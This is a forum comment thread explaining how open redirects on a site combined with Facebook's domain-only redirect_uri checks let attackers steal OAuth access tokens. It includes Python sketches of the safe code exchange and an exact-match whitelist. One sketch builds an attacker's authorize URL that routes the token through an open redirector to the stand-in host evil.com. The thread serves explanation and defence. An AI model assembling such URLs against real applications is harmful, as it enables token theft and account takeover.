Oddly, Facebook has chosen not to follow this recommendation. So any website that integrates Facebook OAuth must ensure that it contains no open redirects, or it can be hacked in this way. This is worrisome because open redirects would not otherwise be considered much of a security problem.
Hopefully not too oddly: Facebook was one of the first OAuth 2.0 implementations, and the additional benefits of requiring stricter pre-registration were not initially apparent. An unfortunate oversight. For kicks: compare section 5.2.3.5 v00 with v01.
Changing the implementation at this point is a daunting task (for both Facebook and our developers) but we do hope to offer it as part of a future migration.
* Why is there an access_token in a browser URL? (query string or fragment)
The access_token is provided by the Authorization Server to the client,
and not to the user.
The user should only receive an authorization_code. And to get an
access_token, the client must have an authorization_code and know
the "client_secret".
An access_token should never be seen in a browser, right?
Does Facebook really respect the protocol? In other words,
is it a Facebook problem or an OAuth problem?
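To make the distinction above concrete, here is a rough sketch of the back-channel half of the authorization-code flow: the server exchanges the code for a token directly with the Authorization Server, so the access_token never passes through the browser. The endpoint URL follows Facebook's documented token endpoint, but the client_id/client_secret values are placeholders.

```python
# Sketch only: how the server-side code->token exchange keeps the
# access_token out of the browser. Parameter names follow OAuth 2.0;
# the credential values are placeholders.
from urllib.parse import urlencode

TOKEN_ENDPOINT = "https://graph.facebook.com/oauth/access_token"

def build_token_request(code, redirect_uri):
    """Return (url, body) for the back-channel code->token exchange.

    This request is sent server-to-server; the browser only ever saw
    the short-lived `code`, never the resulting access_token.
    """
    body = urlencode({
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,       # must match the one used in the authorize step
        "client_id": "YOUR_APP_ID",         # placeholder
        "client_secret": "YOUR_APP_SECRET", # placeholder; never shipped to the browser
    })
    return TOKEN_ENDPOINT, body
```

Because the client_secret is required here, a user (or attacker) who only saw the browser redirect can't complete the exchange themselves.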
To me it seems hyperbolic to call it the "Achilles heel of OAuth [2.0]." OAuth providers other than Facebook are smart enough to keep the redirect_uri constant. Then the attack surface is reduced from the whole of mydomain.com to mydomain.com/whatever-redirect_uri-is. For those, the attack needs to be sophisticated enough to interfere with that specific URL. But if the client site is owned that hard, it's lost anyway.
I'm not sure I understand the problem or security hole here. When I write an OAuth application I need to register my redirect_url. So how can somebody steal the access token / code?
1. You register foo.com as your redirect with FB. Your oauth endpoint is actually foo.com/fbauth, but Facebook is OK with just the domain.
2. Somewhere else on your site, you allow open redirects, like maybe a user can create a link that you proxy with a redirect for click-tracking purposes, like foo.com/links?url=evil.com
3. An attacker makes an oauth query to Facebook with the redirect URL hacked so that it points at foo.com/links?url=evil.com
4. FB dutifully sends your user to the hacked URL, which redirects to evil.com with all of its hashy stuff in place.
5. JavaScript on evil.com reads the hash and uploads it.
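The steps above can be sketched as the attacker would assemble them. This is illustrative only, using the hypothetical foo.com/evil.com hosts from the list; the dialog URL matches Facebook's documented authorize endpoint, and the client_id is a placeholder.

```python
# Sketch of steps 1-5: the attacker builds an authorize URL whose
# redirect_uri points at the victim site's open redirector.
from urllib.parse import urlencode, quote

# Step 2-3: the open redirect on the victim's own domain, wrapping evil.com.
open_redirect = "https://foo.com/links?url=" + quote("https://evil.com/steal", safe="")

# The attacker gets the user to visit this URL (e.g. via a crafted link).
authorize_url = "https://www.facebook.com/dialog/oauth?" + urlencode({
    "client_id": "VICTIM_APP_ID",   # the legitimate app's public id
    "response_type": "token",       # implicit flow: token returned in the fragment
    "redirect_uri": open_redirect,  # passes a domain-only check: it's on foo.com
})
# Step 4-5: FB redirects to foo.com/links?url=...#access_token=...;
# browsers re-attach the fragment across the 302 to evil.com, so
# evil.com's script can read the token from location.hash.
```

The key point is that the redirect_uri really is on foo.com, so a domain-level check passes, yet the final destination is attacker-controlled.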
It's not clear--and I'm too lazy to test--whether FB will restrict the forward to foo.com/fbauth if you're explicit about it when configuring your app. But certainly the wording on the developer console just asks for your site URL, and even though I'm pretty familiar with OAuth, I have never bothered to do more than that. Google, on the other hand, forces you to.
Thanks for the explanation.
May I ask how the attacker can make "an oauth query to Facebook with the redirect URL hacked so that it points at foo.com/links?url=evil.com"? Are you saying that attacker somehow convinces user to visit maliciously created Facebook authentication URL?
Right, I worded that poorly. You need some other vulnerability for the attacker to pull this trick off. But, like homakov says, there are a lot of possibilities for that. Obviously, such a vulnerability is bad on its own and the site owner should prevent it, but FB should be better about mitigating it from their end.
Sorry if I misunderstand, but would that mean that (along with the whitelist/static approach you wrote about) something like "replace hash values" would mitigate the attack?
I currently have an OAuth (1.0a) implementation coming up down the road (and would be very willing to hire you when we begin).
Am I understanding this correctly that a "good" practice would be to always redirect the user to, e.g., a static "you've granted app X permissions" page or some other dummy page (within our domain's control) which the user will simply close, or oob?
Not asking you to dish out your expertise, just a quick question :)
And thanks for the nice articles, you're doing a lot of good.
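One way to picture the whitelist/static practice discussed above is exact-match validation of the redirect_uri on the provider side, rather than domain-prefix matching. This is a minimal sketch with made-up values, not any provider's actual implementation:

```python
# Hedged sketch: validate redirect_uri by exact string comparison against
# the set registered for the app. No prefix or domain matching, so an
# open redirector elsewhere on the same domain can't be named as the
# destination. The registered value is illustrative.
REGISTERED_REDIRECTS = {"https://foo.com/fbauth"}

def redirect_allowed(requested_uri):
    # Exact match only: "https://foo.com/links?url=evil.com" is on the
    # right domain but is not a registered redirect, so it is rejected.
    return requested_uri in REGISTERED_REDIRECTS
```

With this check, the open-redirect trick fails at the authorize step, before any token or code is ever issued.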
I believe they're both in the query string, but you're right - code is what's sent by way of the client. The access_token is exchanged between the servers.
What provider? Facebook never sends it in the query string. A token in the query string is also exposed to man-in-the-middle attackers, in server-side logs, etc. The hash is supposed to be more secure.
For those who are totally confused as to why an access token is being shared with an end user and why it's transmitted in a URL fragment, I think I figured out what's going on. Facebook appears to have a flow for logging in client-side in the browser [1]. In that flow, the access token is meant to be delivered to a JavaScript client in the browser, so a URL fragment makes some sense.
I don't know if any of this is covered by the OAuth spec. (I'm only familiar with the so-called "three-legged" OAuth protocol.)
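To illustrate the client-side flow described above: in the implicit grant, the token comes back in the URL fragment, which the browser never sends over HTTP but which in-page script can read. A rough Python illustration of the parsing (the callback URL and token are made up):

```python
# Illustration only: how a token delivered in a URL fragment is parsed.
# In the real flow this happens in browser JavaScript via location.hash.
from urllib.parse import urlsplit, parse_qs

callback = "https://foo.com/fbauth#access_token=ABC123&expires_in=3600"
fragment = urlsplit(callback).fragment   # "access_token=ABC123&..."
params = parse_qs(fragment)
token = params["access_token"][0]        # "ABC123"
# The fragment is not sent in the HTTP request itself, which is why it
# avoids server logs -- but any script running on the final redirect
# target can read it, which is exactly what the open-redirect attack abuses.
```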
I don't quite get the "let me explain again response_type=code flow" part. It doesn't seem relevant to the article, since the code flow doesn't leak any access token to the client side at all. Though the solution of making the redirect_uri explicit seems pretty good for the original problem.